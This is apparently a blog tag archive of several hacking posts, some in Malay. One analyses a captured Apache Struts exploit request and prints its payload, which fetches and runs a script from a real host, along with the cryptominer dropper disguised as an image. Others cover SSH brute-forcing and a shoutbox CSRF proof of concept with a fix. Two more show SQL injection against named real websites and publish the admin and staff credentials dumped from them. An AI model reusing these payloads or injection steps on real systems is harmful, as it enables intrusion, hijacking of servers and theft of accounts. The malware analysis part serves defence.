Tag Archives: hack

Shell hiding in image files

One day, we noticed strange GET request towards our JBoss server:

GET /login.action   HTTP/1.1
Host: X.X.X.X
Connection: keep-alive 
Accept-Encoding: gzip, deflate 
Accept: */* 
User-Agent: Mozilla/5.0 
Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} 

From the request above, you’ll quickly noticed that this attack leveraging Apache Struts vulnerability from CVE-2017-5638.

The request tried to execute command below:

#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -'

Some explanations:
“-O” : writes the documents to file.
“-” : if is used as file, documents will be printed to standard output, disabling link conversion.
“-q” : quiet (no output)

As you see, it tried to fetch a .jpg file from 91.230.47.41. Seems normal right?
Let’s fetch that file & take a look inside it:

root@mybox:~/a# file logo.jpg
logo.jpg: POSIX shell script, ASCII text executable

ASCII?? Not JPG?? hmm..
Lets see what’s inside the “logo.jpg” file:

root@mybox:~/a# cat logo.jpg
#!/bin/sh
rm -rf /tmp/systemd-logind
rm -rf /tmp/logind.conf
rm -rf /tmp/kworker
rm -rf /tmp/kworker.conf
rm -rf /tmp/kauditd.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f qivtpwwuxs
ps auxf|grep -v grep|grep -v smzgmilpdo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qivtpwwuxs"|awk '{print $2}'|xargs kill -9
ps -fe|grep smzgmilpdo|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/smzgmilpdo.conf
rm -rf /tmp/smzgmilpdo.conf
curl -o /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
wget -O /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/pics/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/pics/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c smzgmilpdo.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

We noticed there are several other file fetched; possibly a config file & bin file.
Let’s fetch those file!

Here is the config file:
http://91.230.47.41/pics/kworker.conf

{{
    "url" : "stratum+tcp://212.129.44.157:80",
    "url" : "stratum+tcp://212.129.46.87:80",
    "url" : "stratum+tcp://212.129.44.156:80",
    "url" : "stratum+tcp://212.129.46.191:80",
    "url" : "stratum+tcp://62.210.29.108:80",
    "url" : "stratum+tcp://212.83.129.195:80",
    "url" : "stratum+tcp://212.129.44.155:80",
    "user" : "466iRjZzJZZWAqzV24ywY8XMVNkp9hj8UJiBEf61Eui6Nw8bEAJ1z434LWM3SKdaDyH7zgNY64rgg2fYmw8cbP5uBjpMA8g",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}

Not sure it is. Maybe some sort of config file for cryptomining. Lets analyze the other 2 files.

First file: http://91.230.47.41/pics/kworker

root@leopardbox:~/91.230.47.41# file kworker
kworker: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

hmm.. an executable Linux file..
Lets see if the file is packed:

root@leopardbox:~/91.230.47.41# upx -l kworker
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2979640 ->   1217152   40.85%  linux/ElfAMD   kworker

Yup. so lets unpacked the file using UPX:

root@leopardbox:~/91.230.47.41# upx -d kworker
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2980813 <-   1217152   40.83%  linux/ElfAMD   kworker

Unpacked 1 file.

root@leopardbox:~/91.230.47.41# upx -l kworker
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: kworker1: NotPackedException: not packed by UPX

Another file: http://91.230.47.41/pics/kworker_na

root@leopardbox:~/91.230.47.41# file kworker_na
kworker_na: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=0x0eedc33c49aeb80818a839a9b23cf159c710e443, stripped

root@leopardbox:~/91.230.47.41# upx -l kworker_na
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: kworker_na: NotPackedException: not packed by UPX

Overall, looks like the attacker want to hack our servers & turn it into his own crypto currency mining machine.
Typical behavior of attack we see in this time where the crypto currency is rising. People hack to make profit. 🙂

Here the MD5 for file above:

211e98ac0686fe98d06570ad0689e9b3  logo.jpg
d2a01b844521fb141b8449f4d8e1c821  kworker.conf
483b322b42835227d98f523f9df5c6fc  kworker (upx packed)
4fa4269b7ce44bfce5ef574e6a37c38f  kworker (upx unpacked)
131df88b7d0b3e7a1c4d84c37e71fb60  kworker_na

VNCViewer for Metasploit payload on Mac OS X

When working with VNC payloads, the Metasploit framework need vncviwer to be installed on the machine. Since Apple includes a VNC Client by default with OSX lets create a simple bash script that will call on the hos:ip combination that Metasploit uses with vncviwer so we do not have to fight with XQuatz and X11 to get one running on OSX:

echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
echo open vnc://\$1 >> /usr/local/bin/vncviewer
chmod +x /usr/local/bin/vncviewer

This will allow us to call from the terminal a connection to a VNC Server like:

vncviewer 192.168.1.120:5901

How to SSH bruteforce on Linux/Mac OS X

SSH is an acronym for Secure Socket sHell, which provides a secure connection access to a remote machine.

By using this SSH Bruteforce tool, you can test security stuff like iptables, sshguard or fail2ban to see whether the rules or policy that have been set working or not. You also able to see the procedure of real hacking attempt.

Like most of brute forcing tools, first you’ll need a big passlist. You can get one from here:

Get SSHBrute python script:

To get it to work you will need this packages:

For Mac OS X user, this is the requirement:

  • Xcode 4.3 (App Store link) or later installed including Command Line Tools or install GCC and Command Line Tools without Xcode
  • Get Paramiko 1.7.7.2+ (or whatever the newest version is), this package includes PyCrypto

Download Paramiko at here:

Then, unzip the Paramiko archive and go to that directory:

Type the following command to start installing:

After that, unzip SSHBrute:

Go to SSHBrute directory:

To start the script, run this command:

The parameter:
-h = hostname/IP address
-u = username/username list
-d = password list

This is how the tool works:

SQLI – buyamotor[dot]com[dot]my

Almost a decade ago I left this things..

Target:              http://www.buyamotor.com.my/motor.php?cat=53
Host IP:            42.1.60.81
Current DB:     buyamoto_buym
Data Bases:      information_schema
                         buyamoto_buym

Data Found:
admin_email | admin_id | admin_user | admin_pwd
[email protected] | 1 | admin | adminpassword

But luckily I didn’t manage to find the admin page.. 🙁 

CSRF in SpiceFuse Shoutbox (MyBB)

bagi sape2 yg ade forum yg berasaskan MyBB, dan yg menggunakan SpiceFuse Shoutbox, baik korg baca bnd ni..
sbb ade bnd yg menarik kat sini.. 🙂
bnd ni Johnburn dr tbd.my yg jmp.. jd aku share kn kat sini..
special thanx to Johnburn utk artikel & solution ni.. 🙂

The stories:
Tadi xda keje aku tgk2 code mybb dengan target nk bypass xss filter mybb melalui bbcode dia. dlm aku tgk2 tu aku nmpk satu bnda yg agak menarik pada code shoutbox (aku install plugin SpiceFuse Shoutbox yg sama mcm kt TBD and my0d). Plugin ni vulnerable kepada CSRF melalui image tag.

PoC:
Jika user post yang berikut kat shoutbox, mana2 user len yg view shoutbox secara automatik akan turut post sebarang post jika browser diset untuk load image (default).

http://www.tbd.my/v2/xmlhttp.php?action=add_shout&shout_data=sebarangPost

Quick Fix:
Bleh elak dengan menggunakan token pada shoutbox. Untuk tmbah token, bleh ikut yg berikut:

Edit file ni:

cari line berikut:

dan gantikan dengan line ni:

Edit file ni:

cari line:

tambah line berikut selpas code di atas:

cari line berikut:

dan gantikan dengan line ni:

Edit file ni:

cari line berikut:

tambah code berikut selepas baris code di atas:

p/s: mungkin perlu reactivate blk shoutbox supaya apa yg diubah pada template untuk take effect.

darkMSSQL tutorial

Hari ini aku nak tunjukkan macam mana cara menggunakan darkMSSQL.py…

benda ni digunakan untuk MSSQL database yang ade error..
Aku jarang jumpa database MSSQL yang ada error..
Kalau jumpa pun, nasib2 je..

Apa2 pun, jom kita tengok macam mana nak gunakan darkMSSQL.py ni..

Usage: ./darkMSSQL.py [options]                        rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --info    Gets MySQL server configuration only.
Define: --dbs     Shows all databases user has access too.
Define: --schema  Enumerate Information_schema Database.
Define: --dump    Extract information from a Database, Table and Column.
Define: --insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL "www.site.com/news.asp?id=2" or  "www.site.com/index.asp?id=news'"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is  darkMSSQLlog.txt
Define: -r        "-r 20" this will make the script resume at row 20  during dumping
Define: --cookie  "cookie_file.txt"
Define: --debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname
Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T  tablename -C username,password
Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T  table -C user,pass --insert -D dbname -T table -C darkuser,darkpass

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --info -u  www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+]  URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs... Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don't forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --dbs -u  www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:  http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don't forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --schema -D  mylittletail_db -u  www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+]  URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don't forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --dump -D  mylittletail_db -T users -C username,password -u  www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+]  URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don't forget to check darkMSSQLlog.txt

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂